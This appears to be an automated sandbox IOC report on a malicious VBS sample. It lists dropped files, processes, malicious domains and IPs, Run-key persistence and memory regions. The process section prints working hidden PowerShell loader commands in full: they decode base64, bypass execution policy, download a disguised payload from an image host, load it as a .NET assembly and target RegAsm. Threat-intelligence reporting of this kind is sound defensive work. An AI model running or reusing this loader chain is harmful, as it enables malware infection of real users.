IOC Report
72625413524.vbs

Files

| File Path | Type | Category | Malicious |
|---|---|---|---|
| 72625413524.vbs | Unicode text, UTF-16, little-endian text, with very long lines (771), with CRLF line terminators | initial sample | malicious |
| C:\ProgramData\Name_File.vbs | Unicode text, UTF-8 text, with CRLF line terminators | dropped | |
| C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\FIwXa[1].txt | Unicode text, UTF-8 text, with very long lines (11434), with CRLF line terminators | dropped | |
| C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive | data | dropped | |
| C:\Users\user\AppData\Local\Temp\Log.tmp | ASCII text, with CRLF line terminators | dropped | |
| C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_11ldtlxc.acp.psm1 | ASCII text, with no line terminators | dropped | |
| C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_bd31duw1.ibv.ps1 | ASCII text, with no line terminators | dropped | |
| C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_extqx3t3.y0o.ps1 | ASCII text, with no line terminators | dropped | |
| C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_fb2iogtw.rhj.psm1 | ASCII text, with no line terminators | dropped | |
| C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_spsywtsd.5l0.psm1 | ASCII text, with no line terminators | dropped | |
| C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_w14w42uu.3wx.ps1 | ASCII text, with no line terminators | dropped | |

Processes

Path
Cmdline
Malicious
C:\Windows\System32\wscript.exe
C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\72625413524.vbs"
malicious
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "$codigo = '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';$oWjuxd = [system.Text.encoding]::Unicode.GetString([system.convert]::Frombase64string( $codigo.replace('DgTre','A') ));powershell.exe -windowstyle hidden -executionpolicy bypass -Noprofile -command $OWjuxD"
malicious
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -Noprofile -command "function DownloadDataFromLinks { param ([string[]]$links) $webClient = New-Object System.Net.WebClient; $downloadedData = @(); $shuffledLinks = $links | Get-Random -Count $links.Length; foreach ($link in $shuffledLinks) { try { $downloadedData += $webClient.DownloadData($link) } catch { continue } }; return $downloadedData }; $links = @('https://uploaddeimagens.com.br/images/004/771/542/original/new_image.jpg?1713394820', 'https://uploaddeimagens.com.br/images/004/771/542/original/new_image.jpg?1713394820'); $imageBytes = DownloadDataFromLinks $links; if ($imageBytes -ne $null) { $imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes); $startFlag = '<<BASE64_START>>'; $endFlag = '<<BASE64_END>>'; $startIndex = $imageText.IndexOf($startFlag); $endIndex = $imageText.IndexOf($endFlag); if ($startIndex -ge 0 -and $endIndex -gt $startIndex) { $startIndex += $startFlag.Length; $base64Length = $endIndex - $startIndex; $base64Command = $imageText.Substring($startIndex, $base64Length); $commandBytes = [System.Convert]::FromBase64String($base64Command); $loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes); $type = $loadedAssembly.GetType('PROJETOAUTOMACAO.VB.Home'); $method = $type.GetMethod('VAI').Invoke($null, [object[]] ('txt.irpawx/rorre/moc.seporrehtnap//:sptth' , '1' , 'C:\ProgramData\' , 'Name_File','RegAsm',''))} }"
malicious
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden Copy-Item -Path *.vbs -Destination C:\ProgramData\Name_File.vbs
malicious
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
"C:\Windows\Microsoft.Net\Framework\v4.0.30319\RegAsm.exe"
malicious
C:\Windows\System32\wscript.exe
"C:\Windows\System32\WScript.exe" "C:\ProgramData\Name_File.vbs"
malicious
C:\Windows\System32\wscript.exe
"C:\Windows\System32\WScript.exe" "C:\ProgramData\Name_File.vbs"
malicious
C:\Windows\System32\conhost.exe
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\System32\conhost.exe
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

URLs

| Name | IP | Malicious |
|---|---|---|
| http://pesterbdd.com/images/Pester.png | unknown | malicious |
| https://pantherropes.com/error/xwapri.txt | 116.206.104.215 | malicious |
| aprilxrwonew8450.duckdns.org | | malicious |
| https://uploaddeimagens.com.br/images/004/771/542/original/new_image.jpg?1713394820 | 172.67.215.45 | malicious |
| http://nuget.org/NuGet.exe | unknown | |
| http://www.apache.org/licenses/LICENSE-2.0 | unknown | |
| http://www.apache.org/licenses/LICENSE-2.0.html | unknown | |
| https://contoso.com/License | unknown | |
| https://www.google.com; | unknown | |
| https://contoso.com/Icon | unknown | |
| https://analytics.paste.ee | unknown | |
| https://aka.ms/pscore6 | unknown | |
| https://paste.ee/d/FIwXaU | unknown | |
| https://github.com/Pester/Pester | unknown | |
| https://www.google.com | unknown | |
| https://lesferch.github.io/DesktopPic | unknown | |
| https://contoso.com/ | unknown | |
| https://nuget.org/nuget.exe | unknown | |
| https://oneget.orgX | unknown | |
| https://paste.ee/ | unknown | |
| https://analytics.paste.ee; | unknown | |
| https://paste.ee/d/FIwXa | 172.67.187.200 | |
| https://cdnjs.cloudflare.com | unknown | |
| https://aka.ms/pscore68 | unknown | |
| https://cdnjs.cloudflare.com; | unknown | |
| http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name | unknown | |
| https://secure.gravatar.com | unknown | |
| https://themes.googleusercontent.com | unknown | |
| https://oneget.org | unknown | |
| https://paste.ee/d/FIwXaok | unknown | |

Domains

| Name | IP | Malicious |
|---|---|---|
| pantherropes.com | 116.206.104.215 | malicious |
| aprilxrwonew8450.duckdns.org | 134.255.217.251 | malicious |
| uploaddeimagens.com.br | 172.67.215.45 | malicious |
| paste.ee | 172.67.187.200 | |

IPs

| IP | Domain | Country | Malicious |
|---|---|---|---|
| 134.255.217.251 | aprilxrwonew8450.duckdns.org | Germany | malicious |
| 116.206.104.215 | pantherropes.com | Seychelles | malicious |
| 172.67.215.45 | uploaddeimagens.com.br | United States | malicious |
| 172.67.187.200 | paste.ee | United States | |

Registry

| Path | Value | Malicious |
|---|---|---|
| HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run | Path | malicious |
| HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32 | EnableFileTracing | |
| HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32 | EnableAutoFileTracing | |
| HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32 | EnableConsoleTracing | |
| HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32 | FileTracingMask | |
| HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32 | ConsoleTracingMask | |
| HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32 | MaxFileSize | |
| HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32 | FileDirectory | |
| HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS | EnableFileTracing | |
| HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS | EnableAutoFileTracing | |
| HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS | EnableConsoleTracing | |
| HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS | FileTracingMask | |
| HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS | ConsoleTracingMask | |
| HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS | MaxFileSize | |
| HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS | FileDirectory | |

Memdumps

heap
page read and write
212E2E03000
heap
page read and write
2CC1EC11000
heap
page read and write
2CC1F47F000
heap
page read and write
27939ECB000
heap
page read and write
212E2D28000
heap
page read and write
7FF8489E0000
trusted library allocation
page read and write
1104000
heap
page read and write
27902801000
trusted library allocation
page read and write
5A70000
trusted library allocation
page execute and read and write
2793B8B0000
trusted library allocation
page read and write
2209AB60000
trusted library allocation
page read and write
2209C4B0000
heap
page execute and read and write
212E2E03000
heap
page read and write
2BE0000
trusted library allocation
page read and write
EFE000
stack
page read and write
124E000
stack
page read and write
2793B830000
heap
page read and write
2CC1CC43000
heap
page read and write
D481EFE000
stack
page read and write
5C851FD000
stack
page read and write
2CC1EC18000
heap
page read and write
7FF848A90000
trusted library allocation
page read and write
FEE000
stack
page read and write
212E4BCA000
heap
page read and write
67ED000
stack
page read and write
2CC1EC73000
heap
page read and write
B6DBEFE000
stack
page read and write
22ECD579000
heap
page read and write
2209C9AB000
trusted library allocation
page read and write
2CC1E9B4000
heap
page read and write
2CC1F3A1000
heap
page read and write
22ECD524000
heap
page read and write
2CC1F490000
heap
page read and write
212E6870000
trusted library allocation
page read and write
22ECD5EF000
heap
page read and write
7FF848B30000
trusted library allocation
page read and write
F66000
trusted library allocation
page execute and read and write
212E2D5F000
heap
page read and write
212E4B30000
heap
page read and write
22ECB7C0000
heap
page read and write
22ECB7CB000
heap
page read and write
22ECD527000
heap
page read and write
212E2D5D000
heap
page read and write
27939EE1000
heap
page read and write
2209ABB5000
heap
page read and write
212E4D0E000
heap
page read and write
2CC1CBE7000
heap
page read and write
2209CC8E000
trusted library allocation
page read and write
1C1AF46B000
trusted library allocation
page read and write
2CC1CC43000
heap
page read and write
B6DC07E000
stack
page read and write
F53000
trusted library allocation
page read and write
E90000
heap
page read and write
7FF848A40000
trusted library allocation
page read and write
DB0000
heap
page read and write
B6DCFCE000
stack
page read and write
2CC1F59E000
heap
page read and write
2209A934000
heap
page read and write
2CC1EC79000
heap
page read and write
2CC1EE90000
heap
page read and write
22ECB726000
heap
page read and write
2CC1CC2E000
heap
page read and write
7FF8489C0000
trusted library allocation
page read and write
2CC1CC34000
heap
page read and write
2CC1F580000
heap
page read and write
6B6C000
stack
page read and write
212E4B37000
heap
page read and write
2793B91A000
heap
page read and write
F7B000
trusted library allocation
page execute and read and write
2209CE02000
trusted library allocation
page read and write
2CC1EA03000
heap
page read and write
F44000
trusted library allocation
page read and write
220B49EC000
heap
page read and write
2CC1EA03000
heap
page read and write
2BF0000
heap
page execute and read and write
212E2DF0000
heap
page read and write
22ECD5E4000
heap
page read and write
2CC1E9F4000
heap
page read and write
212E4B4F000
heap
page read and write
2CC1E9D7000
heap
page read and write
2209C99D000
trusted library allocation
page read and write
2BED000
trusted library allocation
page read and write
7FF848B30000
trusted library allocation
page read and write
7FF848A10000
trusted library allocation
page execute and read and write
1C1ABCA0000
heap
page read and write
220B4EA0000
heap
page read and write
212E2DFB000
heap
page read and write
2CC1CC6B000
heap
page read and write
B6DC17E000
stack
page read and write
1C1AF55C000
trusted library allocation
page read and write
2B9F000
stack
page read and write
7FF848850000
trusted library allocation
page read and write
22ECD5D5000
heap
page read and write
27909E01000
trusted library allocation
page read and write
1C1BDD64000
trusted library allocation
page read and write
2CC1ECFA000
heap
page read and write
120E000
stack
page read and write
2CC1CEB0000
heap
page read and write
22ECD6FE000
heap
page read and write
2209CF8A000
trusted library allocation
page read and write
2CC1E9DB000
heap
page read and write
212E2D50000
heap
page read and write
2CC1CEC5000
heap
page read and write
212E4B42000
heap
page read and write
2209C9AE000
trusted library allocation
page read and write
22ECD0B0000
heap
page read and write
2CC1EC7F000
heap
page read and write
B6DBE7E000
stack
page read and write
5A3E000
stack
page read and write
22ECB7CB000
heap
page read and write
516E000
stack
page read and write
22ECD711000
heap
page read and write
2CC1EC19000
heap
page read and write
6DEC000
stack
page read and write
212E2BF0000
heap
page read and write
7FF848A70000
trusted library allocation
page read and write
6EED000
stack
page read and write
22ECD527000
heap
page read and write
220B4B30000
heap
page read and write
22ECD514000
heap
page read and write
1C1AF036000
trusted library allocation
page read and write
F77000
trusted library allocation
page execute and read and write
7FF848960000
trusted library allocation
page execute and read and write
2CC1ECFA000
heap
page read and write
C833F7E000
stack
page read and write
7FF848AF0000
trusted library allocation
page read and write
212E2D49000
heap
page read and write
212E4B24000
heap
page read and write
2CC1F584000
heap
page read and write
22ECD51B000
heap
page read and write
2209CC56000
trusted library allocation
page read and write
22ECD500000
heap
page read and write
5520000
heap
page read and write
10D0000
heap
page read and write
22ECB7CF000
heap
page read and write
212E4C73000
heap
page read and write
2209CF9D000
trusted library allocation
page read and write
212E4BCD000
heap
page read and write
5CBBCFE000
stack
page read and write
212E4B81000
heap
page read and write
2209CE2A000
trusted library allocation
page read and write
1030000
heap
page read and write
C83443C000
stack
page read and write
212E4B2B000
heap
page read and write
2209AAD0000
trusted library allocation
page read and write
22ECD520000
heap
page read and write
22ECBA65000
heap
page read and write
7FF8488E0000
trusted library allocation
page execute and read and write
212E4BD9000
heap
page read and write
212E4D11000
heap
page read and write
212E4B89000
heap
page read and write
7FF848AE0000
trusted library allocation
page read and write
212E2F3D000
heap
page read and write
2CC1F53E000
heap
page read and write
2CC1ECEA000
heap
page read and write
2CC1EC1E000
heap
page read and write
7FF848AB0000
trusted library allocation
page read and write
1C1C5BC3000
heap
page read and write
2CC1CC33000
heap
page read and write
1C1ABB30000
heap
page read and write
212E4BF4000
heap
page read and write
E1B60FE000
stack
page read and write
7FF848AA0000
trusted library allocation
page read and write
22ECF410000
trusted library allocation
page read and write
22ECD527000
heap
page read and write
2CC1F581000
heap
page read and write
7FF8488FC000
trusted library allocation
page execute and read and write
212E2DFB000
heap
page read and write
2793BD20000
heap
page execute and read and write
212E4D10000
heap
page read and write
212E4BA1000
heap
page read and write
2CC1EC24000
heap
page read and write
22ECBA68000
heap
page read and write
212E2DEB000
heap
page read and write
1C1ABBA8000
heap
page read and write
22ECB7CB000
heap
page read and write
1060000
trusted library allocation
page execute and read and write
2CC1EC8F000
heap
page read and write
22ECD0B4000
heap
page read and write
2CC1EAF0000
heap
page read and write
2CC1CBA9000
heap
page read and write
22ECB7C0000
heap
page read and write
212E4BBE000
heap
page read and write
50FE000
trusted library allocation
page read and write
2CC1F47F000
heap
page read and write
212E2DEB000
heap
page read and write
22ECD5DF000
heap
page read and write
7FF848A00000
trusted library allocation
page execute and read and write
12E0000
trusted library allocation
page read and write
2793BDD0000
heap
page execute and read and write
22ECD5A2000
heap
page read and write
22ECB72D000
heap
page read and write
212E4BC1000
heap
page read and write
1C1ABBEC000
heap
page read and write
2CC1CBAF000
heap
page read and write
2CC1F455000
heap
page read and write
2CC1EA0A000
heap
page read and write
212E4BE2000
heap
page read and write
E1B67FB000
stack
page read and write
22ECD5EB000
heap
page read and write
7DF473740000
trusted library allocation
page execute and read and write
22ECD6FC000
heap
page read and write
5CBBBFF000
stack
page read and write
5112000
trusted library allocation
page read and write
E1B64FE000
stack
page read and write
1C1ADB40000
heap
page execute and read and write
2793B8A0000
heap
page readonly
212E4BC6000
heap
page read and write
22ECB680000
heap
page read and write
1C1AF6EE000
trusted library allocation
page read and write
2CC1EC79000
heap
page read and write
212E4C11000
heap
page read and write
212E4D0C000
heap
page read and write
212E4B30000
heap
page read and write
B6DBFFD000
stack
page read and write
22ECD515000
heap
page read and write
12CE000
stack
page read and write
22ECBA6A000
heap
page read and write
22ECD50F000
heap
page read and write
5510000
heap
page execute and read and write
2CC1EE70000
heap
page read and write
2CC1ECBF000
heap
page read and write
2CC1CC43000
heap
page read and write
2CC1E9CA000
heap
page read and write
22ECD507000
heap
page read and write
22ECB7A2000
heap
page read and write
7FF848A70000
trusted library allocation
page read and write
212E2D40000
heap
page read and write
50EB000
trusted library allocation
page read and write
C833C3F000
unkown
page read and write
22ECD53F000
heap
page read and write
7FF8488D6000
trusted library allocation
page read and write
22ECB670000
heap
page read and write
22ECB6F0000
heap
page read and write
10CE000
heap
page read and write
C8343BE000
stack
page read and write
2CC1EA3D000
heap
page read and write
220AC881000
trusted library allocation
page read and write
2CC1EA0A000
heap
page read and write
1C1C5BFA000
heap
page read and write
22ECB7C3000
heap
page read and write
2C3D000
trusted library allocation
page read and write
2CC1E9B6000
heap
page read and write
22ECB792000
heap
page read and write
2CC1F589000
heap
page read and write
7FF848B50000
trusted library allocation
page read and write
212E4B43000
heap
page read and write
1C1ABBDE000
heap
page read and write
2CC1EA03000
heap
page read and write
2793B914000
heap
page read and write
C833CBE000
stack
page read and write
2CC1EC10000
heap
page read and write
22ECD5D2000
heap
page read and write
7FF848B40000
trusted library allocation
page read and write
212E2DEE000
heap
page read and write
3C68000
trusted library allocation
page read and write
212E2DCD000
heap
page read and write
51C3000
heap
page read and write
212E4BEF000
heap
page read and write
7FF848A80000
trusted library allocation
page read and write
2CC1EA05000
heap
page read and write
5C8537E000
stack
page read and write
212E2F39000
heap
page read and write
220AC890000
trusted library allocation
page read and write
2CC1E9B7000
heap
page read and write
7FF848AD0000
trusted library allocation
page read and write
220B493F000
heap
page read and write
B6DC0FD000
stack
page read and write
212E6679000
heap
page read and write
220B4939000
heap
page read and write
212E2F3A000
heap
page read and write
1C1ABDC0000
heap
page read and write
2CC1CC45000
heap
page read and write
22ECB792000
heap
page read and write
212E4D0E000
heap
page read and write
2CC1CC01000
heap
page read and write
7FF848906000
trusted library allocation
page execute and read and write
7FF848A60000
trusted library allocation
page read and write
2CC1F3B3000
heap
page read and write
22ECD571000
heap
page read and write
2CC1EA3D000
heap
page read and write
2CC1EA03000
heap
page read and write
2CC1EC12000
heap
page read and write
22ECD5BD000
heap
page read and write
6619000
heap
page read and write
1C1AD6A4000
heap
page read and write
212E4B16000
heap
page read and write
F50000
trusted library allocation
page read and write
220B4A10000
heap
page read and write
212E4B30000
heap
page read and write
2209C881000
trusted library allocation
page read and write
2C39000
trusted library allocation
page read and write
212E4BB5000
heap
page read and write
22ECB7CB000
heap
page read and write
7FF848A40000
trusted library allocation
page read and write
220B493C000
heap
page read and write
212E4B37000
heap
page read and write
2CC1F3AD000
heap
page read and write
617E000
stack
page read and write
1C1ADAF0000
heap
page execute and read and write
2CC1EC94000
heap
page read and write
22ECD601000
heap
page read and write
2CC1F3FB000
heap
page read and write
212E4C10000
heap
page read and write
7FF8489DA000
trusted library allocation
page read and write
2CC1EA0A000
heap
page read and write
22ECD5D5000
heap
page read and write